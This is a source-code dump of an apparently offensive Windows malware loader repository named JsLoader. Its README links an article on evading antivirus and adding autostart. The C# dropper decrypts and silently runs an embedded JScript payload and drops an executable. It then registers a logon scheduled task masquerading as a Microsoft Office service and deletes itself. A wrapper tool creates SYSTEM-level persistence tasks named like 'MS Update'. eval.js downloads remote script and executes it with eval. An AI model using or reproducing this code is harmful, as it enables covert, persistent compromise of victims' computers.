├── Program.cs
├── Readme.md
├── TaskSchedulerWrapper
├── TaskSchedulerWrapper.sln
└── TaskSchedulerWrapper
│ ├── Program.cs
│ ├── Properties
│ ├── AssemblyInfo.cs
│ └── app.manifest
│ ├── TaskSchedulerWrapper.csproj
│ ├── app.config
│ ├── bin
│ └── Debug
│ │ ├── Microsoft.Win32.TaskScheduler.dll
│ │ ├── TaskScheduler.exe
│ │ └── TaskScheduler4.exe
│ └── packages.config
└── eval.js
/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Security.Cryptography;
5 | using System.Text;
6 | using TaskScheduler;
7 |
8 | namespace jsLoader
9 | {
10 | class Program
11 | {
12 | static string v1gf8hg16cx1d = "要释放的js,可以先用des加密再放进来";
13 | static string gh216f9ghj156 = Decode(v1gf8hg16cx1d);
14 | public static string Decode(string data)
15 | {
16 | byte[] bytes = Encoding.ASCII.GetBytes("key");
17 | byte[] bytes2 = Encoding.ASCII.GetBytes("IV");
18 | byte[] buffer;
19 | try
20 | {
21 | buffer = System.Convert.FromBase64String(data);
22 | }
23 | catch
24 | {
25 | return null;
26 | }
27 | DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();
28 | MemoryStream stream = new MemoryStream(buffer);
29 | CryptoStream stream2 = new CryptoStream(stream, descryptoServiceProvider.CreateDecryptor(bytes, bytes2), CryptoStreamMode.Read);
30 | StreamReader streamReader = new StreamReader(stream2);
31 | return streamReader.ReadToEnd();
32 | }
33 | static void Main(string[] args)
34 | {
35 | //这边随便写写释放文件的方法
36 | string allowedChars = "abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNOPQRSTUVWXYZ0123456789";
37 | int passwordLength = 32;
38 | char[] chars = new char[passwordLength];
39 | char[] charss = new char[passwordLength];
40 | Random rd = new Random();
41 |
42 | for (int i = 0; i < passwordLength; i++)
43 | {
44 | chars[i] = allowedChars[rd.Next(0, allowedChars.Length)];
45 | }
46 | for (int i = 0; i < passwordLength; i++)
47 | {
48 | charss[i] = allowedChars[rd.Next(0, allowedChars.Length)];
49 | }
50 |
51 | string pwd = new string(chars);
52 | string pwd2 = new string(charss);
53 |
54 | try
55 | {
56 | byte[] byDll = global::jsLoader.Properties.Resource1.test; //把自启动要运行的文件放到resource里面,然后这边会导出
57 | string strPath = Path.GetTempPath() + @"\" + pwd2 + ".exe";//设置释放路径
58 | //创建文件(覆盖模式)
59 | using (FileStream fs = new FileStream(strPath, FileMode.Create))
60 | {
61 | fs.Write(byDll, 0, byDll.Length);
62 | }
63 | StreamWriter sw = new StreamWriter(Path.GetTempPath() + "/" + pwd + ".tmp");
64 | sw.Write(gh216f9ghj156);
65 | sw.Flush();
66 | sw.Close();
67 | Process CmdProcess = new Process();
68 | CmdProcess.StartInfo.FileName = "cscript.exe";
69 | CmdProcess.StartInfo.CreateNoWindow = true;
70 | CmdProcess.StartInfo.UseShellExecute = false;
71 | CmdProcess.StartInfo.RedirectStandardInput = true;
72 | CmdProcess.StartInfo.RedirectStandardOutput = true;
73 | CmdProcess.StartInfo.RedirectStandardError = true;
74 | CmdProcess.StartInfo.Arguments = "/e:JScript " + Path.GetTempPath() + "/" + pwd + ".tmp";
75 | CmdProcess.Start();
76 | CmdProcess.WaitForExit();
77 | CmdProcess.Close();
78 | //运行完就把文件删掉,自启动的文件运行时重新释放出来
79 | if (File.Exists(Path.GetTempPath() + "/" + pwd + ".tmp"))
80 | {
81 | try
82 | {
83 | File.Delete(Path.GetTempPath() + "/" + pwd + ".tmp");
84 | }
85 | catch (System.IO.IOException e)
86 | {
87 | Console.WriteLine(e.Message);
88 | }
89 | }
90 | //新建计划任务
91 | TaskSchedulerClass scheduler = new TaskSchedulerClass();
92 | //连接
93 | scheduler.Connect(null, null, null, null);
94 | //获取创建任务的目录
95 | ITaskFolder folder = scheduler.GetFolder("\\");
96 | //设置参数
97 | ITaskDefinition task = scheduler.NewTask(0);
98 | task.RegistrationInfo.Author = "Microsoft Office";//创建者
99 | task.RegistrationInfo.Description = "This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.";//描述
100 | //设置触发机制(此处是 登陆后)
101 | task.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_LOGON);
102 | //设置动作(此处为运行exe程序)
103 | IExecAction action = (IExecAction)task.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC);
104 | action.Path = Path.GetTempPath() + @"\" + pwd2 + ".exe";//设置文件目录
105 | task.Settings.ExecutionTimeLimit = "PT0S"; //运行任务时间超时停止任务吗? PTOS 不开启超时
106 | task.Settings.DisallowStartIfOnBatteries = false;//只有在交流电源下才执行
107 | task.Settings.RunOnlyIfIdle = false;//仅当计算机空闲下才执行
108 |
109 | IRegisteredTask regTask =
110 | folder.RegisterTaskDefinition("Office ClickToRun Service Monitor", task,//此处需要设置任务的名称(name)
111 | (int)_TASK_CREATION.TASK_CREATE, null, //user
112 | null, // password
113 | _TASK_LOGON_TYPE.TASK_LOGON_INTERACTIVE_TOKEN,
114 | "");
115 | IRunningTask runTask = regTask.Run(null);
116 | Console.WriteLine("OK");
117 | //运行后自杀
118 | string s = Process.GetCurrentProcess().MainModule.FileName;
119 | Process.Start("Cmd.exe", "/c del " + "\"" + s + "\"");
120 | Process.GetCurrentProcess().Kill();
121 | }
122 | catch (Exception ex)
123 | {
124 | Console.WriteLine(ex.Message);
125 | Console.WriteLine(ex.StackTrace);
126 | }
127 | }
128 | }
129 | }
130 |
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | # JsLoader
2 |
3 | 文章:[免杀shellcode并绕过杀毒添加自启动](https://wtfsec.org/posts/%E5%85%8D%E6%9D%80shellcode%E5%B9%B6%E7%BB%95%E8%BF%87%E6%9D%80%E6%AF%92%E6%B7%BB%E5%8A%A0%E8%87%AA%E5%90%AF%E5%8A%A8/)
4 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.757
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TaskSchedulerWrapper", "TaskSchedulerWrapper\TaskSchedulerWrapper.csproj", "{24101193-5ABA-45D0-A5C0-320D78A88FF2}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {D520469B-FCD2-4948-87B9-FCBBE923DB78}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/Program.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32.TaskScheduler;
2 | using System;
3 | using System.Diagnostics;
4 | using System.IO;
5 |
6 | namespace TaskSchedulerWrapper
7 | {
8 | class Program
9 | {
10 | static void Main(string[] args)
11 | {
12 | logo();
13 | string taskname = null;
14 | string parameter = null;
15 | string path = null;
16 | if (args.Length > 0)
17 | {
18 | foreach (var arg in args)
19 | {
20 | string userQue = arg.Split('=')[0].Trim();
21 | string userAns = arg.Split('=')[1].Trim();
22 | switch (userQue)
23 | {
24 | case "--taskname":
25 | taskname = userAns;
26 | break;
27 | case "--arg":
28 | parameter = userAns;
29 | break;
30 | case "--path":
31 | path = userAns;
32 | break;
33 | }
34 | }
35 |
36 | if (path != null && taskname != null)
37 | {
38 | path = Path.GetFullPath(path);
39 | if (File.Exists(path) == true)
40 | {
41 | if (!GetExists(taskname))
42 | {
43 | Console.WriteLine("任务计划不存在,正在添加...");
44 | CreateTask(path, taskname, parameter);
45 | Console.WriteLine("添加完毕,正在验证是否存在...");
46 | if (GetExists(taskname))
47 | {
48 | Console.WriteLine("验证成功,退出线程。");
49 | }
50 | else
51 | {
52 | Console.WriteLine("验证失败,可能被杀毒拦截,退出线程。");
53 | }
54 | }
55 | else
56 | {
57 | Console.WriteLine("计划任务已存在,尝试删除计划任务...");
58 | DeleteTask(taskname);
59 | if (GetExists(taskname))
60 | {
61 | Console.WriteLine("删除失败,退出线程。");
62 | }
63 | else
64 | {
65 | Console.WriteLine("删除成功,正在添加...");
66 | CreateTask(path, taskname, parameter);
67 | Console.WriteLine("添加完毕,正在验证是否存在...");
68 | if (GetExists(taskname))
69 | {
70 | Console.WriteLine("验证成功,退出线程。");
71 | }
72 | else
73 | {
74 | Console.WriteLine("验证失败,可能被杀毒拦截,退出线程。");
75 | }
76 | }
77 | }
78 | killMe();
79 | }
80 | else
81 | {
82 | Console.Write("文件不存在或路径不合法,退出线程。");
83 | }
84 | }
85 | else
86 | {
87 | Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"Executable File\" --arg=\"Arguments\"(Optional) --taskname=\"TaskScheduler name\"");
88 | Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"cscript.exe\" --arg=\"/E:Jscript 123.js\" --taskname=\"MS Update\"");
89 | Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"file.exe\" --taskname=\"MS Update\"");
90 | }
91 | }
92 | else
93 | {
94 | Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"Executable File\" --arg=\"Arguments\"(Optional) --taskname=\"TaskScheduler name\"");
95 | Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"cscript.exe\" --arg=\"/E:Jscript 123.js\" --taskname=\"MS Update\"");
96 | Console.WriteLine("[*]Usage: TaskScheduler.exe --path=\"file.exe\" --taskname=\"MS Update\"");
97 | }
98 | }
99 | static bool GetExists(string taskName)
100 | {
101 | var exists = false;
102 | TaskService ts = new TaskService();
103 | TaskCollection tc = ts.RootFolder.GetTasks();
104 | if (tc.Exists(taskName))
105 | {
106 | exists = true;
107 | }
108 | return exists;
109 | }
110 | static void CreateTask(string Path, string taskName, string arg = "")
111 | {
112 | TaskService ts = new TaskService();
113 | TaskDefinition td = ts.NewTask();
114 | td.RegistrationInfo.Author = "WDST";
115 | td.RegistrationInfo.Description = "";
116 | td.Triggers.Add(new LogonTrigger { });
117 | td.Actions.Add(new ExecAction(Path, arg, null));
118 | td.Settings.DisallowStartIfOnBatteries = false;
119 | td.Settings.RunOnlyIfIdle = false;
120 | ts.RootFolder.RegisterTaskDefinition(taskName, td, TaskCreation.CreateOrUpdate, "SYSTEM", null, TaskLogonType.ServiceAccount).Run();
121 | }
122 | static void DeleteTask(string taskName)
123 | {
124 | TaskService ts = new TaskService();
125 | ts.RootFolder.DeleteTask(taskName);
126 | }
127 |
128 | static void killMe()
129 | {
130 | string s = Process.GetCurrentProcess().MainModule.FileName;
131 | Process CmdProcess = new Process();
132 | CmdProcess.StartInfo.FileName = "cmd.exe";
133 | CmdProcess.StartInfo.CreateNoWindow = true;
134 | CmdProcess.StartInfo.UseShellExecute = false;
135 | CmdProcess.StartInfo.RedirectStandardInput = true;
136 | CmdProcess.StartInfo.RedirectStandardOutput = true;
137 | CmdProcess.StartInfo.RedirectStandardError = true;
138 | CmdProcess.StartInfo.Arguments = "/c ping -n 1 localhost 1>nul & del " + "\"" + s + "\"";
139 | CmdProcess.Start();
140 | CmdProcess.Close();
141 | Process.GetCurrentProcess().Kill();
142 | }
143 |
144 | static void logo()
145 | {
146 | Console.WriteLine(@" _____ _ ___ _ _ _ ");
147 | Console.WriteLine(@" |_ _|_ _ __| |__/ __| __| |_ ___ __| |_ _| |___ _ _ ");
148 | Console.WriteLine(@" | |/ _` (_-< / /\__ \/ _| ' \/ -_) _` | || | / -_) '_|");
149 | Console.WriteLine(@" |_|\__,_/__/_\_\|___/\__|_||_\___\__,_|\_,_|_\___|_| ");
150 | Console.WriteLine();
151 | }
152 | }
153 | }
154 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // 組件的一般資訊是由下列的屬性集控制。
6 | // 變更這些屬性的值即可修改組件的相關
7 | // 資訊。
8 | [assembly: AssemblyTitle("TaskSchedulerWrapper")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("TaskSchedulerWrapper")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // 將 ComVisible 設為 false 可對 COM 元件隱藏
18 | // 組件中的類型。若必須從 COM 存取此組件中的類型,
19 | // 的類型,請在該類型上將 ComVisible 屬性設定為 true。
20 | [assembly: ComVisible(false)]
21 |
22 | // 下列 GUID 為專案公開 (Expose) 至 COM 時所要使用的 typelib ID
23 | [assembly: Guid("24101193-5aba-45d0-a5c0-320d78a88ff2")]
24 |
25 | // 組件的版本資訊由下列四個值所組成:
26 | //
27 | // 主要版本
28 | // 次要版本
29 | // 組建編號
30 | // 修訂編號
31 | //
32 | // 您可以指定所有的值,或將組建編號或修訂編號設為預設值
33 | // 指定為預設值:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/Properties/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
48 |
55 |
56 |
70 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/TaskSchedulerWrapper.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {24101193-5ABA-45D0-A5C0-320D78A88FF2}
9 | Exe
10 | TaskSchedulerWrapper
11 | TaskSchedulerWrapper
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 |
29 |
30 | AnyCPU
31 | pdbonly
32 | true
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 |
38 |
39 | LocalIntranet
40 |
41 |
42 | false
43 |
44 |
45 |
46 | Properties\app.manifest
47 |
48 |
49 |
50 | False
51 | bin\Debug\Microsoft.Win32.TaskScheduler.dll
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | 此專案參考這部電腦上所缺少的 NuGet 套件。請啟用 NuGet 套件還原,以下載該套件。如需詳細資訊,請參閱 http://go.microsoft.com/fwlink/?LinkID=322105。缺少的檔案是 {0}。
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/Microsoft.Win32.TaskScheduler.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/JsLoader/58e4f8d9a8d5402e5cc839242cf5def2b74ca989/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/Microsoft.Win32.TaskScheduler.dll
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/JsLoader/58e4f8d9a8d5402e5cc839242cf5def2b74ca989/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler.exe
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/JsLoader/58e4f8d9a8d5402e5cc839242cf5def2b74ca989/TaskSchedulerWrapper/TaskSchedulerWrapper/bin/Debug/TaskScheduler4.exe
--------------------------------------------------------------------------------
/TaskSchedulerWrapper/TaskSchedulerWrapper/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/eval.js:
--------------------------------------------------------------------------------
1 | var xml=new ActiveXObject("Microsoft.XMLHTTP");
2 | xml.open("GET","http://127.0.0.1/ccc.js",false);
3 | xml.send();
4 | var aaa=xml.responseText;
5 | eval(aaa);
--------------------------------------------------------------------------------